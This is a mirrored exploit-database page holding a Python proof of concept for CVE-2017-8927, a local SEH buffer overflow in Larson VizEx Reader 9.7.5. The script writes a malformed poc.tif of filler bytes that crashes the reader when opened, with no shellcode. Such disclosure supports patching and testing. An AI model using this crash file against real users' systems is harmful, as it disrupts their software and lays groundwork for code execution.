Skip to content
cyberexploits
doswindowstext

Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)

Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)

Publié le 2017-05-14

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/windows/dos/42002.txt7eac4c3a
raw
#!/usr/bin/python

# Exploit Title     : Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)

# Date              : 14/05/2017

# Exploit Author    : Muhann4d

# CVE				: CVE-2017-8927

# Vendor Homepage   : http://www.cgmlarson.com/

# Software Link     : http://download.freedownloadmanager.org/Windows-PC/Larson-VizEx-Reader/FREE-9.7.5.html

# Affected Versions : 9.7.5   

# Category          : Denial of Service (DoS) Local

# Tested on OS      : Windows 7 Professional SP1 32bit

# Proof of Concept  : run the exploit, open the poc.tif file with Larson VizEx Reader 9.7.5



# Vendor has been cantacted but no reply



buf = "\x41" * 800

buff = "\x42" * 4

bufff = "\x43" * 4

buffff = "\x44" * 9999

f = open ("poc.tif", "w")

f.write(buf + buff + bufff + buffff)

f.close()







Voir sur GitHub